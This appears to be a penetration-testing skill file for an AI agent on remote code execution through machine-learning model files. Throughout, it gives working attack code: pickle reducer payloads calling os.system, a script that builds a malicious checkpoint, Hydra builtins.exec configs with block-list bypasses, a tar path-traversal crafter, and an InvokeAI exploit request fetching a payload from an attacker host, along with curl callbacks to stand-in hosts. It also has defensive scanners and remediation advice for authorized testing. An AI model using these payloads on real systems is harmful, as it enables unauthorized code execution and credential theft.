exploiting-ai-model-file-rce

Testing machine-learning model files and model-loading services for remote code execution caused by insecure deserialization (pickle/PyTorch), unsafe config instantiation (Hydra), archive path traversal, and dangerous layer types during authorized penetration tests of AI/ML pipelines.

Updated: June 6, 2026 at 16:41

Source

xalgord

xalgord/xalgorix

SKILL.md

name	exploiting-ai-model-file-rce
description	Testing machine-learning model files and model-loading services for remote code execution caused by insecure deserialization (pickle/PyTorch), unsafe config instantiation (Hydra), archive path traversal, and dangerous layer types during authorized penetration tests of AI/ML pipelines.
domain	cybersecurity
subdomain	ai-security
tags	["ai-security","model-deserialization","penetration-testing"]
version	1.0
author	xalgorix
license	Apache-2.0

Exploiting AI Model File RCE

When to Use

During authorized assessments of ML training/inference pipelines, model registries, artifact buckets, or model hubs
When a service downloads, loads, or "installs" models from user-controlled URLs or untrusted repositories
When auto-resume/auto-deploy pipelines load checkpoints (.ckpt, .pt, .pth, .bin) without provenance checks
When assessing web UIs and model servers such as InvokeAI, TorchServe, Triton, or NeMo/HuggingFace loaders that accept model files
When reviewing whether "safe" formats (.safetensors, .nemo, repo config.json) still expose instantiation gadgets

Prerequisites

Authorization: Written penetration testing agreement covering the ML systems and any callback infrastructure
Python 3 with torch, joblib, numpy, tensorflow/keras to craft and load test artifacts in a sandbox
fickling, modelscan, picklescan: static analyzers to inspect pickle opcodes before/after crafting payloads
A controlled callback host: HTTP listener / OOB server (e.g. interactsh) for blind execution confirmation
Isolated VM/container: NEVER load untrusted models on your own host — payloads run during load

Critical: Techniques Most Often Missed (test these for EVERY model artifact)

Scanners that only diff weights miss code execution that fires during load, before any inference runs. For every model file or model-loading endpoint, work the full matrix below.

# 1. Python pickle reducer (THE #1 vector). Any pickle-backed format runs
#    __reduce__ on load: .pkl, .pt, .pth, .ckpt, .bin, joblib, and numpy
#    .npy/.npz object arrays when allow_pickle=True.
#    torch.load with weights_only=False (the default before PyTorch 2.6)
#    deserializes arbitrary pickle → code exec.
class Payload:
    def __reduce__(self):
        import os
        # benign confirmation marker, in line with the non-destructive guidance below
        return (os.system, ("id > /tmp/pwned",))

# 2. Hydra _target_ instantiation — NO pickle needed. Triggers on "safe"
#    formats (.safetensors __metadata__, .nemo model_config.yaml, config.json)
#    when libs feed untrusted metadata to hydra.utils.instantiate().
#      _target_: builtins.exec
#      _args_: ["import os; os.system('id')"]
#    Block-list bypass: enum.bltns.eval, nemo.core.classes.common.os.system

# 3. Keras/TensorFlow Lambda layer — arbitrary Python in legacy .h5/HDF5 and
#    .keras (safe_mode does NOT cover the old H5 format → "downgrade attack").
#    Also CVE-2021-37678: yaml.unsafe_load when loading model from YAML.

# 4. Archive path traversal — most formats are .zip/.tar under the hood.
#    Craft member name "../../tmp/hacked" or a SYMTYPE symlink to write/read
#    arbitrary files on load (ONNX external-weights, model tars).

# 5. GGUF / GGML parser memory corruption (CVE-2024-25664..25668): malformed
#    .gguf triggers heap overflow in the parser.

# 6. Service-level loaders: torch.load on user URL (InvokeAI CVE-2024-12029),
#    TorchServe management API (ShellTorch), Triton --model-control path
#    traversal, numpy np.load with allow_pickle=True (the default has been
#    False since NumPy 1.16.3, so look for code that re-enables it).

How to CONFIRM a hit (avoid destructive payloads)

Use a benign, observable side effect — not a destructive command — to confirm execution:

File-drop marker: os.system("id > /tmp/pwned_$(hostname)") then read /tmp/pwned_*.
OOB callback: curl http://OOB-ID.oob.example/ or DNS lookup; a hit proves blind execution.
Static pre-check: fickling --check-safety model.pt or modelscan -p model.pt should flag the reducer/GLOBAL+REDUCE opcodes before you ever load it.
For Hydra: a process spawn at from_pretrained/restore_from time, before weights load.
Treat ANY child process, outbound connection, or unexpected file at load time as a confirmed hit.
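The static pre-check can also be approximated with the standard library alone when fickling or modelscan is not available. The sketch below walks the opcode stream with `pickletools.genops` and lists the globals a pickle would import, without ever unpickling it. The function names, the `SUSPICIOUS_MODULES` deny-list, and the `Marker` class are illustrative assumptions, not part of any scanner's API, and the `STACK_GLOBAL` resolution is a heuristic (it takes the last two string constants), so treat the result as a triage hint rather than a verdict.

```python
import pickle
import pickletools

# Hypothetical starter deny-list; tune it per engagement.
SUSPICIOUS_MODULES = {"os", "posix", "nt", "subprocess", "builtins",
                      "sys", "importlib", "runpy"}


def list_imports(data: bytes):
    """Return (module, name) pairs the pickle would import. Nothing is unpickled."""
    found = []
    strings = []  # recent string constants, used to resolve STACK_GLOBAL
    for opcode, arg, _pos in pickletools.genops(data):
        if opcode.name in ("GLOBAL", "INST"):
            # pickletools reports the argument as "module name"
            module, name = arg.split(" ", 1)
            found.append((module, name))
        elif opcode.name == "STACK_GLOBAL":
            # protocol 4+: module and name were pushed as the two preceding strings
            if len(strings) >= 2:
                found.append((strings[-2], strings[-1]))
        elif isinstance(arg, str):
            strings.append(arg)
    return found


def flag_suspicious(data: bytes):
    """Keep only imports whose top-level module is on the deny-list."""
    return [(m, n) for m, n in list_imports(data)
            if m.split(".")[0] in SUSPICIOUS_MODULES]


class Marker:
    """Harmless stand-in for a reducer: loading it would only call len("abc")."""
    def __reduce__(self):
        return (len, ("abc",))


if __name__ == "__main__":
    blob = pickle.dumps(Marker())  # serializing does not invoke the callable
    print(flag_suspicious(blob))
```

A zip-based PyTorch checkpoint keeps its pickle in an inner `data.pkl` member, so the bytes would need to be read out of the archive (for example with `zipfile`) before being passed to `list_imports`.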

Workflow

Step 1: Identify the Loader and Format

Determine exactly how the target ingests models and which API does the deserialization.

# Map model file extensions present in registry/bucket/repo
# .pt .pth .ckpt .bin .pkl  -> pickle-backed (torch.load / joblib / pickle)
# .h5 .hdf5 .keras          -> Keras (Lambda layer / yaml)
# .safetensors .nemo        -> "safe" weights BUT check for Hydra _target_ metadata
# .onnx                     -> archive/external-weights traversal
# .gguf .ggml               -> parser memory corruption
# .npy .npz                 -> numpy allow_pickle

# Inspect a sample pickle artifact statically BEFORE loading
fickling --check-safety suspicious.pt
modelscan -p suspicious.pt
picklescan -p suspicious.pkl
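
File extensions are attacker-controlled, so it can help to classify an artifact by its leading bytes before choosing a scanner. The following is a minimal sketch under that assumption; the `MAGICS` table and the `sniff` helper are illustrative names, and the list covers only the container formats discussed in this skill.

```python
# Leading-byte signatures for the formats mapped above (illustrative, not exhaustive).
MAGICS = [
    (b"PK\x03\x04", "zip container (PyTorch >= 1.6 checkpoint, .npz, .keras)"),
    (b"\x89HDF\r\n\x1a\n", "HDF5 (legacy Keras .h5)"),
    (b"GGUF", "GGUF"),
    (b"\x93NUMPY", "NumPy .npy"),
    (b"\x80", "raw pickle (protocol 2 or later)"),
]


def sniff(header: bytes) -> str:
    """Classify a model artifact from its first bytes, ignoring the extension."""
    for magic, label in MAGICS:
        if header.startswith(magic):
            return label
    return "unknown"


def sniff_file(path: str) -> str:
    """Read only the first 16 bytes of the file; nothing is parsed or loaded."""
    with open(path, "rb") as fh:
        return sniff(fh.read(16))
```

A `.safetensors` file that sniffs as a raw pickle, or a `.bin` that sniffs as a zip container, is a mismatch worth recording before any deeper analysis.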

Step 2: Craft a PyTorch / pickle Reducer Payload

The reducer returns a callable + args executed during unpickling.

# payload_gen.py  (run only in an isolated lab)
import torch, os

class Evil:
    def __reduce__(self):  # benign confirmation marker, not destructive
        return (os.system, ("id > /tmp/pwned; curl http://OOB-ID.oob.example/",))

# place under a key deserialized early so it fires before weights are used
torch.save({"model_state_dict": Evil(), "trainer_state": {"epoch": 10}}, "malicious.ckpt")

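On the victim side, the reducer runs inside torch.load("malicious.ckpt", weights_only=False) while the file is being unpickled, so it fires even if the load then fails with an error. A raw .pkl behaves the same way when written with pickle.dump(Evil(), f).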
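
For the remediation side of the same mechanism, a loader can refuse every global that is not explicitly allowed by overriding `pickle.Unpickler.find_class`, the pattern the Python documentation describes for restricting globals. The sketch below is an assumption-laden illustration: the `ALLOWED` set, `AllowListUnpickler`, `safe_loads`, `is_blocked`, and the harmless `Probe` class are hypothetical names, and a real checkpoint loader would need a longer allow-list.

```python
import io
import pickle
from collections import OrderedDict

# Hypothetical allow-list: only these (module, name) globals may be resolved.
ALLOWED = {("collections", "OrderedDict")}


class AllowListUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Called for every GLOBAL/STACK_GLOBAL opcode before anything is invoked.
        if (module, name) in ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"blocked global: {module}.{name}")


def safe_loads(data: bytes):
    """Unpickle data, resolving only allow-listed globals."""
    return AllowListUnpickler(io.BytesIO(data)).load()


def is_blocked(data: bytes) -> bool:
    """True if the allow-list rejects the pickle."""
    try:
        safe_loads(data)
    except pickle.UnpicklingError:
        return True
    return False


class Probe:
    """Harmless reducer used to exercise the check: it references builtins.len."""
    def __reduce__(self):
        return (len, ("abc",))


if __name__ == "__main__":
    print(safe_loads(pickle.dumps(OrderedDict(epoch=10))))
    print(is_blocked(pickle.dumps(Probe())))
```

Plain containers and scalars load without touching `find_class`, so a state dict of primitives passes while any reducer that names an unlisted callable is rejected before it runs.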

Step 3: Craft a Hydra `_target_` Payload for "Safe" Formats

When the loader passes model metadata/config to hydra.utils.instantiate(), no pickle is required.

# goes in .nemo model_config.yaml, repo config.json, or .safetensors __metadata__
_target_: builtins.exec
_args_:
  - "import os; os.system('id > /tmp/pwned')"  # benign marker, not a destructive command

If a string block-list is present, bypass via alternative import paths (enum.bltns.eval) or application-resolved names (nemo.core.classes.common.os.system).
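
Because string block-lists are this easy to sidestep, a finding is stronger when it shows what an allow-list check would have caught. The sketch below walks an already-parsed config (a plain `dict`, however it was loaded) and reports every `_target_` that falls outside an allow-list. It does not import Hydra; `ALLOWED_TARGET_PREFIXES`, `find_targets`, and `disallowed_targets` are hypothetical names chosen for illustration.

```python
# Hypothetical allow-list of dotted-path prefixes a project is willing to instantiate.
ALLOWED_TARGET_PREFIXES = ("torch.nn.", "torch.optim.")


def find_targets(node, path="$"):
    """Recursively collect (location, target) for every string `_target_` key."""
    hits = []
    if isinstance(node, dict):
        for key, value in node.items():
            if key == "_target_" and isinstance(value, str):
                hits.append((path, value))
            else:
                hits.extend(find_targets(value, f"{path}.{key}"))
    elif isinstance(node, (list, tuple)):
        for index, value in enumerate(node):
            hits.extend(find_targets(value, f"{path}[{index}]"))
    return hits


def disallowed_targets(config):
    """Return the `_target_` entries that do not start with an allowed prefix."""
    return [(where, target) for where, target in find_targets(config)
            if not target.startswith(ALLOWED_TARGET_PREFIXES)]


if __name__ == "__main__":
    config = {
        "model": {"_target_": "torch.nn.Linear", "in_features": 4, "out_features": 2},
        "hook": {"_target_": "builtins.exec", "_args_": ["pass"]},
    }
    print(disallowed_targets(config))
```

Prefix matching is the weaker form of this check, since a permitted package may re-export a dangerous callable; matching exact dotted names is stricter where the set of legitimate targets is small.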

Step 4: Craft Archive Traversal / Keras Lambda Variants

# Archive path traversal: write outside the extract dir on load
import tarfile
def escape(member):
    member.name = "../../tmp/hacked"
    return member
with tarfile.open("traversal_demo.model", "w:gz") as tf:
    tf.add("harmless.txt", filter=escape)

# Symlink variant (member.type = SYMTYPE, linkname = /tmp) rides a planted file
# Keras Lambda layer: a model containing a Lambda(lambda x: __import__('os').system('id'))
#   runs on load; legacy .h5 bypasses safe_mode entirely (downgrade attack).
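
To show in a report what a safe extractor should have rejected, the archive can be inspected without extracting anything. The sketch below resolves each member name against the intended destination and flags names that escape it, along with any symlink or hardlink member. `unsafe_members` and `demo_archive` are hypothetical helpers, and `/srv/models` is an assumed destination path used only for the comparison.

```python
import io
import os
import tarfile


def unsafe_members(archive: tarfile.TarFile, dest: str):
    """List member names that would land outside dest, plus any link members."""
    dest_real = os.path.realpath(dest)
    flagged = []
    for member in archive.getmembers():
        target = os.path.realpath(os.path.join(dest_real, member.name))
        escapes = os.path.commonpath([dest_real, target]) != dest_real
        if escapes or member.issym() or member.islnk():
            flagged.append(member.name)
    return flagged


def demo_archive() -> tarfile.TarFile:
    """Build a two-member tar in memory: one normal name, one traversal name."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as out:
        for name in ("weights.bin", "../../tmp/hacked"):
            payload = b"demo"
            info = tarfile.TarInfo(name)
            info.size = len(payload)
            out.addfile(info, io.BytesIO(payload))
    buf.seek(0)
    return tarfile.open(fileobj=buf, mode="r")


if __name__ == "__main__":
    # Nothing is written to disk; only the member names are evaluated.
    print(unsafe_members(demo_archive(), "/srv/models"))
```

On Python 3.12 and later (and patched earlier releases), `TarFile.extractall(path, filter="data")` applies comparable checks at extraction time, which is worth naming as the fix when a loader calls `extractall` without a filter.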

Step 5: Exploit a Model-Loading Service (InvokeAI CVE-2024-12029)

When a service downloads+loads models from a URL, host the payload and trigger the endpoint.

import requests
# 1) host payload.ckpt (a pickle reducer) on http://ATTACKER/payload.ckpt
# 2) trigger the unauthenticated install endpoint (scan defaults to false in 5.3.1-5.4.2)
requests.post(
    "http://TARGET:9090/api/v2/models/install",
    params={"source": "http://ATTACKER/payload.ckpt", "inplace": "true"},
    json={}, timeout=5,
)
# torch.load() runs the os.system gadget -> RCE as the InvokeAI process
# Metasploit: exploit/linux/http/invokeai_rce_cve_2024_12029

For Transformers4Rec/Merlin (CVE-2025-23298) and FaceDetection-DSFD, the same reducer is delivered via a trojanized checkpoint or pushed as a serialized blob to a deserializing endpoint.

Step 6: Confirm and Assess Blast Radius

# confirm out-of-band: inspect OOB server for the callback; on a lab target verify the
# /tmp/pwned marker and running user (often root in containers).
# record: runs as root/privileged container? network egress + ~/.aws/~/.ssh/registry creds?
#         loader in an auto-resume/auto-deploy pipeline (wormable)?

Key Concepts

Concept	Description
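Pickle Reducer	`__reduce__` returns a callable plus arguments that the unpickler invokes during load (`__setstate__` and similar hooks also run at load time); this is the core RCE primitive
weights_only	`torch.load(file, weights_only=True)` restricts unpickling to an allow-list of types; with `weights_only=False` arbitrary pickle runs. CVE-2025-32434 is a bypass of `weights_only=True` that was fixed in PyTorch 2.6.0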
Hydra instantiate	`hydra.utils.instantiate()` imports+calls any dotted `_target_` from untrusted config/metadata, no pickle needed
Lambda layer RCE	Keras Lambda layers store arbitrary Python; legacy `.h5` bypasses `safe_mode` (downgrade attack)
Archive slip	Model formats are `.zip`/`.tar`; crafted member names or symlinks cause path traversal write/read on load
Parser memory corruption	Malformed GGUF/TFLite files trigger heap overflows in native parsers
Safe format ≠ safe load	`.safetensors`/`.nemo` carry metadata that can still reach an instantiation gadget

Tools & Systems

Tool	Purpose
fickling	Decompile/inspect and safety-check pickle opcodes; detect malicious GLOBAL/REDUCE
modelscan (Protect AI)	Scan PyTorch/TF/Keras/joblib model files for unsafe operators before loading
picklescan	Lightweight scanner for dangerous imports/opcodes in pickle files
Metasploit	`invokeai_rce_cve_2024_12029`, `flowise_*` and other model-service RCE modules
safetensors	Non-executable weights format; recommended remediation target
Isolated VM/container	Mandatory sandbox for loading any untrusted artifact (seccomp/AppArmor, no egress)

Common Scenarios

Scenario 1: Trojanized Checkpoint in a Model Hub

A .ckpt shared on an internal hub embeds a __reduce__ gadget. An auto-resume training job calls torch.load(..., weights_only=False) and executes the payload as root in the training container.

Scenario 2: InvokeAI URL Install RCE

InvokeAI 5.3.1–5.4.2 exposes /api/v2/models/install with scan=false default. Pointing source at an attacker-hosted .ckpt triggers torch.load pickle deserialization and unauthenticated RCE.

Scenario 3: "Safe" Format Still Pops a Shell

A .safetensors model ships an __metadata__ block with _target_: builtins.exec. The loader feeds metadata to hydra.utils.instantiate() during from_pretrained, executing code before weights load.

Scenario 4: ONNX/Model Tar Path Traversal

A model tar contains a member named ../../home/user/.bashrc. Extraction during model load overwrites the file, achieving persistence/RCE on the next shell session.

Output Format

## AI Model File RCE Finding

**Vulnerability**: Remote Code Execution via Insecure Model Deserialization
**Severity**: Critical (CVSS 9.8)
**Component**: torch.load() in /api/v2/models/install (model loader service)
**CVE / Class**: CVE-2024-12029 / Insecure Deserialization (CWE-502)

### Reproduction Steps
1. Host payload.ckpt (pickle __reduce__ -> os.system) on attacker HTTP server
2. POST source=http://ATTACKER/payload.ckpt to /api/v2/models/install (no auth)
3. Service calls torch.load(); reducer executes; OOB callback received at OOB-ID.oob.example

### Evidence
| Item | Detail |
|------|--------|
| Trigger | torch.load(path) with weights_only unset |
| Confirmation | OOB HTTP callback + /tmp/pwned marker (uid=0 root) |
| Blast radius | Worker runs as root in container with AWS creds + egress |
| Static detector | fickling --check-safety flagged REDUCE -> os.system |

### Recommendation
1. Never deserialize untrusted models; prefer Safetensors/ONNX for weights
2. Use torch.load(weights_only=True) or an allow-listed unpickler
3. Enforce model provenance/signatures and malware-scan before load (scan=True)
4. Sandbox deserialization: non-root, seccomp/AppArmor, no network egress
5. Reject untrusted Hydra _target_ / Keras Lambda; validate config metadata
6. Patch loaders (InvokeAI >= 5.4.3, TorchServe, Triton, GGML) to fixed versions
